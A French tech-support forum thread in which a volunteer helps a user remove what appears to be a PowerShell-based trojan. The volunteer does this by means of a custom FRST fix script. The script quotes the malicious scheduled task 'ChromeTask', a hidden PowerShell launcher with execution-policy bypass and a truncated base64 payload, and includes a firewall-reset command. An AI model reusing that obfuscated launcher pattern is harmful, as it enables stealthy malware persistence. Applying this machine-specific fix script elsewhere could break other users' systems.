Virus PowerShell

Résolu/Fermé
Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022 - Modifié le 14 janv. 2022 à 21:12
bazfile Messages postés 54839 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 20 juin 2024 - 28 janv. 2022 à 20:41
J'ai un problème avec powershell car il s'ouvre tous les 15 min et se referme directement cela m'embete fortement quand je joue .... Pouvez vous m'aider s'il vous plait .
MERCI

2 réponses

bazfile Messages postés 54839 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 20 juin 2024 18 791
14 janv. 2022 à 21:14
Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser

Attention, attendre que les messages disant que l'analyse est terminée s'affichent


À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition, .

Ensuite envoie les rapports FRST et ADDITION sur CJOINT
voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.

0
Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022
14 janv. 2022 à 21:26
Voici les deux liens :
Addition : https://www.cjoint.com/c/LAoux28HbHg
Frst : https://www.cjoint.com/c/LAouyMl3o0g
Merci d'etre aussi réactif .
0
bazfile Messages postés 54839 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 20 juin 2024 18 791 > Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022
Modifié le 14 janv. 2022 à 21:43
Procédure à faire dans l'ordre indiqué :
1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1099541378-3990462571-2549696652-1001\...\Run: [ut] => "C:\Users\33601\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED (Pas de fichier)
HKU\S-1-5-21-1099541378-3990462571-2549696652-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
GroupPolicy: Restriction ?
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
cmd: netsh advfirewall reset
Task: {0AA80B58-FEDA-4F6D-B2D3-B98D3B5104D7} - System32\Tasks\Opera scheduled Autoupdate 1595298619 => C:\Users\33601\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {3818618C-6B97-4259-8B01-DFCB529C84C0} - System32\Tasks\ChromeTask => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 6027 caractères en plus).
Task: {B87E4C76-FCBB-4277-938F-999A26C8B681} - System32\Tasks\Opera scheduled Autoupdate 1633301122 => C:\Users\33601\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR NewTab: Default -> Not-active:"chrome-extension://mhffmephdchhhbfjmdpoaldedhhdanbn/homePageRedirect.html"
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
C:\WINDOWS\system32\Tasks\ChromeTask
IE trusted site: HKU\S-1-5-21-1099541378-3990462571-2549696652-1001\...\webcompanion.com -> hxxp://webcompanion.com
AlternateDataStreams: C:\WINDOWS\system32\msln.exe:b32e32229dacaa6b8fd4ecfaabfaa90d [494]
AlternateDataStreams: C:\ProgramData\TEMP:FB6A21E3 [140]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [486]
FirewallRules: [{BA3A39EC-9486-47C9-81A8-837350759A65}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege - Test Server\RainbowSix_BE.exe => Pas de fichier
FirewallRules: [{60FDB7CE-96B0-4364-9098-1AB615BB659C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's Rainbow Six Siege - Test Server\RainbowSix_BE.exe => Pas de fichier
FirewallRules: [{AF1AB971-E170-49BB-AE56-A912063B2BAD}] => (Allow) C:\Users\33601\AppData\Local\Programs\Opera\69.0.3686.77\opera.exe => Pas de fichier
FirewallRules: [{E7DB8C68-3CAB-4579-BE21-AB7F4A15CBAB}] => (Allow) C:\Program Files (x86)\Nox\bin\Nox.exe => Pas de fichier
FirewallRules: [{8A3B6FAC-C7B2-4D30-96E7-8A07B2C4F493}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => Pas de fichier
FirewallRules: [{7E82DBAF-5BEA-4FF4-8DF9-545F53B13B49}] => (Allow) C:\Users\33601\AppData\Roaming\uTorrent\uTorrent.exe => Pas de fichier
FirewallRules: [{2D93C194-4154-4BDC-AB63-58DF0E0B6C78}] => (Allow) C:\Users\33601\AppData\Roaming\uTorrent\uTorrent.exe => Pas de fichier
FirewallRules: [{341B23AD-7162-4E4C-A2E7-9AEE1FFF520E}] => (Allow) C:\Users\33601\AppData\Local\Programs\Opera\79.0.4143.72\opera.exe => Pas de fichier
FirewallRules: [TCP Query User{5BAC2BC6-6B9C-42EF-8871-4807E74EB868}C:\games\city car driving\bin\win32\starter.exe] => (Allow) C:\games\city car driving\bin\win32\starter.exe => Pas de fichier
FirewallRules: [UDP Query User{B9D40800-457C-4FF9-9270-6E0737CCBC79}C:\games\city car driving\bin\win32\starter.exe] => (Allow) C:\games\city car driving\bin\win32\starter.exe => Pas de fichier
FirewallRules: [{3A775179-91F8-40E3-BADF-54A742189DF3}] => (Block) C:\games\city car driving\bin\win32\starter.exe => Pas de fichier
FirewallRules: [{87D47D11-B263-4E33-B157-68EE143D2A66}] => (Block) C:\games\city car driving\bin\win32\starter.exe => Pas de fichier
Hosts:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.



Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Une fois ton ordinateur redémarré :

4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

IMPORTANT :

5- Réinitialise Google Chrome avec CE LOGICIEL.
Puis :

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


POUR INFORMATION:

Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps.
0
Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022
14 janv. 2022 à 21:47
Merci
Tenez le lien Fixlog
https://www.cjoint.com/c/LAouUCcG1Dg .
0
bazfile Messages postés 54839 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 20 juin 2024 18 791 > Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022
14 janv. 2022 à 21:51
Le fixlog est OK, ton pc va mieux ?
0
Ilyas52 Messages postés 4 Date d'inscription vendredi 14 janvier 2022 Statut Membre Dernière intervention 14 janvier 2022
14 janv. 2022 à 21:52
Pour l'instant ca ne l'as pas encore fais mais je pense que c'est bon.
Merci beaucoup !!
C'etait cheval de troie non ???
0
xxgoosiraiderxx
28 janv. 2022 à 20:25
bonjour, j'ai Windows defender qui viens de me bloquer une multitude de fichier correspondant a tasks powershell je n'arrive pas a supprimer le fichier dans : C:\Windows\System32\Tasks\ChromeTask le fichier tasks je ne peut pas l'enlever .....
0
bazfile Messages postés 54839 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 20 juin 2024 18 791
Modifié le 28 janv. 2022 à 20:42
0